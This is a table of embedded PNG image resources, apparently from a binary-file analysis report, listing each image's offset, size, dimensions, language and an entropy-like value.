                                                                                                                                                                                                                                                                                                                                                                                        PNG0x34c8780xb5PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0165745856353592
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36f1d00xacbPNG image data, 22 x 88, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0039811798769454
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3818300xbc8PNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036472148541113
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3823f80xc2ePNG image data, 14 x 276, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035279025016035
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37e2400x5ddPNG image data, 15 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0073284477015323
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37dca80x597PNG image data, 15 x 76, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0076869322152342
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37d6b00x5f8PNG image data, 15 x 84, 8-bit/color RGBA, non-interlacedEnglishUnited States1.007198952879581
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37d2300x237PNG image data, 54 x 69, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0194003527336861
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37e8200x588PNG image data, 22 x 44, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0077683615819208
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3765000x4b6PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0091210613598673
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3769b80x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36c7c80x5fePNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0071707953063884
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36cdc80xdd3PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9960440802486578
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36dba00x7cPNG image data, 1 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9919354838709677
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38ea080x13c1PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021752026893416
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3913c80x37dPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0123180291153415
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3910300x395PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0119956379498365
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38fdd00x125ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023394300297745
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38bbf00x13b4PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021808088818398
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38e6980x369PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126002290950744
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38e2c80x3ccPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113168724279835
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38cfa80x1320PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002246732026144
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3917480x13acPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021842732327244
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3941300x364PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012672811059908
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x393d700x3baPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0115303983228512
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x392af80x1274PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023285351397122
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3863000x139fPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021899263388414
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x388c800x380PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3889280x352PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0129411764705882
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3876a00x1288PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002318718381113
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3830280x211PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0207939508506616
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3832400x2e4PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0148648648648648
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3836000x13adPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021838395870557
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x385f980x365PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126582278481013
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x385c200x374PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3849b00x126bPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023329798515377
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3835280xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3944980x1394PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00219473264166
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x396f300x374PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x396b380x3f4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108695652173914
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3958300x1304PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0022596548890714
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3890000x1397PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021934197407776
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38b8780x373PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124575311438277
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38b5380x33dPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0132689987937273
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x38a3980x119ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002439024390244
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3817880xa6PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36df180x211PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0207939508506616
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x36dc200x2f7PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37d0480x16ePNG image data, 9 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.030054644808743
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37d1b80x73PNG image data, 5 x 5, 8-bit/color RGB, non-interlacedEnglishUnited States0.9826086956521739
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37d5980x117PNG image data, 11 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021505376344086
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37cfe00x67PNG image data, 2 x 55, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902912621359223
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3803b00xcePNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0242718446601942
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3807a00xa40PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9733231707317073
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3804800x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3807080x93PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136054421768708
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x37fa400x96aPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004564315352697
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3aa9e00x552PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0080763582966226
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3aaf380x532PNG image data, 64 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0082706766917293
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a08400x624PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.006997455470738
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a0e680xf6fPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0027841052898
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a1dd80x98PNG image data, 1 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.013157894736842
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c15580x13c1PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021752026893416
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c38a80x37dPNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0123180291153415
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c35100x395PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0119956379498365
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c29200xbeaPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0036065573770492
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3beda80x13b4PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021808088818398
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c11e80x369PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126002290950744
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c0e180x3ccPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113168724279835
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c01600xcb2PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0033846153846153
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c3c280x13acPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021842732327244
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c5f980x364PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012672811059908
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c5bd80x3baPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0115303983228512
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c4fd80xbffPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035818951481603
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ba1600x139fPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021899263388414
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3bc4500x380PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3bc0f80x352PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0129411764705882
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3bb5000xbf8PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035900783289817
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b74980x1e3PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0227743271221532
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b76800x3d2PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0112474437627812
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b7b300x13adPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021838395870557
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b9df80x365PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126582278481013
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b9a800x374PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b8ee00xb9aPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0037037037037038
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b7a580xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c63000x1394PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00219473264166
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c86f80x374PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c83000x3f4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108695652173914
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3c76980xc62PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034700315457412
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3bc7d00x1397PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021934197407776
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3bea300x373PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124575311438277
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3be6f00x33dPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0132689987937273
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3bdb680xb84PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0003392130257802
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b5e900xb1PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0169491525423728
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a21e80x1daPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0232067510548524
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3a1e700x375PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124293785310734
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b16000x1a5PNG image data, 9 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0261282660332542
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b17a80x71PNG image data, 5 x 5, 8-bit/color RGB, non-interlacedEnglishUnited States0.9911504424778761
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b1b680x11aPNG image data, 11 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0283687943262412
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b15980x67PNG image data, 2 x 55, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902912621359223
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b49e80xe0PNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.03125
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b4de80xa40PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9733231707317073
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b4ac80x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b4d500x93PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136054421768708
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b40600x985PNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00451374640952
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b36900x9caPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00438946528332
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3b33500x339PNG image data, 11 x 45, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0133333333333334
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39c2c00x214PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0206766917293233
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39c4d80x22ePNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0197132616487454
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39c7a00xb3PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States1.011173184357542
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39c7080x95PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9932885906040269
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39c8580x414PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010536398467433
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x39cc700x414PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010536398467433
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f66b80x125ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023394300297745
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f24d80x13b4PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021808088818398
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f4f800x369PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126002290950744
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f4bb00x3ccPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113168724279835
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f38900x1320PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002246732026144
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f80300x13acPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021842732327244
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3faa180x364PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012672811059908
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3fa6580x3baPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0115303983228512
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f93e00x1274PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023285351397122
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ecbe80x139fPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021899263388414
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ef5680x380PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ef2100x352PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0129411764705882
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3edf880x1288PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002318718381113
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e91880x99dPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004469727752946
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e9b280x2e6PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0148247978436657
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e9ee80x13adPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021838395870557
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ec8800x365PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126582278481013
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ec5080x374PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3eb2980x126bPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023329798515377
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e9e100xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3fad800x1394PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00219473264166
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3fd8180x374PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3fd4200x3f4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108695652173914
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3fc1180x1304PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0022596548890714
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ef8e80x1397PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021934197407776
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f21600x373PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124575311438277
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f1e200x33dPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0132689987937273
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3f0c800x119ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002439024390244
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e78e80xa6PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d30080x99dPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004469727752946
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3d2d100x2f7PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e31f00x17ePNG image data, 9 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0287958115183247
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e33700x71PNG image data, 5 x 5, 8-bit/color RGB, non-interlacedEnglishUnited States0.9911504424778761
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e36c00x117PNG image data, 11 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021505376344086
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e31880x67PNG image data, 2 x 55, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902912621359223
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e64d80xd7PNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0232558139534884
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e68d00xa40PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9733231707317073
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e65b00x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e68380x93PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136054421768708
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e5b680x96aPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004564315352697
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e51c80x99bPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0044733631557543
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3e4ed00x2f7PNG image data, 11 x 45, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cd9880x1d3PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.019271948608137
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cdb600x1f8PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0138888888888888
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cddf00x67PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States0.9514563106796117
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cdd580x95PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cde580x39dPNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011891891891892
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ce1f80x39dPNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011891891891892
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ce5980x1c1PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.024498886414254
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ce7600x153PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0324483775811208
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cea780x15fPNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0113960113960114
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cebd80x100PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.03515625
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ce8b80x108PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.018939393939394
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3ce9c00xb6PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010989010989011
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cecd80x151PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.032640949554896
                                                                                                                                                                                                                                                                                                                                                                                        PNG0x3cee300x135PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.029126213592233
PNG | 0x3d0968 | 0xdd3 | PNG image data, 57 x 120, 8-bit/color RGBA, non-interlaced | English | United States | 0.9960440802486578
PNG | 0x3d1740 | 0x129 | PNG image data, 72 x 15, 8-bit/color RGB, non-interlaced | English | United States | 1.0303030303030303
PNG | 0x3d05f8 | 0x10b | PNG image data, 30 x 24, 8-bit/color RGB, non-interlaced | English | United States | 1.0337078651685394
PNG | 0x3d0570 | 0x87 | PNG image data, 35 x 3, 8-bit/color RGB, non-interlaced | English | United States | 1.0074074074074073
PNG | 0x3cff00 | 0x12f | PNG image data, 9 x 9, 8-bit/color RGB, non-interlaced | English | United States | 1.0264026402640265
PNG | 0x3cfa70 | 0x48d | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.009442060085837
PNG | 0x3ff4e8 | 0xdd1 | PNG image data, 72 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.003109980209217
PNG | 0x404ba0 | 0xd61 | PNG image data, 55 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.0032116788321168
PNG | 0x405908 | 0x265 | PNG image data, 55 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.0179445350734095
PNG | 0x405b70 | 0xbb9 | PNG image data, 20 x 40, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036654448517162
PNG | 0x406730 | 0xc66 | PNG image data, 10 x 28, 8-bit/color RGBA, non-interlaced | English | United States | 1.0034656584751103
PNG | 0x407398 | 0xb90 | PNG image data, 10 x 28, 8-bit/color RGBA, non-interlaced | English | United States | 1.0037162162162163
